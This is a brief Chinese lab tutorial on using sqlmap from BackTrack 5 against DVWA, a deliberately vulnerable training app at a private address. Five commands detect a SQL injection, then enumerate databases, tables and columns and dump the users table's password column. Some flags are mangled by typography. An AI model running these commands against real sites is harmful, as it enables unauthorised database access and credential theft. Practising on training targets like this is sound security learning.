BT5利用sqlmap对漏洞靶机扫描

1、通过sqlmap进行注入***：root@bt:/pentest/database/sqlmap# python sqlmap.py -u'http://192.168.0.133/dvwa/vu

.

1、通过sqlmap进行注入***：

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'

2、通过sqlmap获取数据库名：

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'--dbs -v 0

3、通过sqlmap获取表名；

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa –tables

4、通过sqlmap获取列名：

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826;PHPSESSID=7ka4shiqc8t58bgp2ds82p0140' -D dvwa --tables -T users –columns

5、通过sqlmap导出password列的内容：

root@bt:/pentest/database/sqlmap# python sqlmap.py  -u'http://192.168.0.133/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='security=low; fws_guest=16983826; PHPSESSID=7ka4shiqc8t58bgp2ds82p0140'-D dvwa --tables -T users --columns –dump

.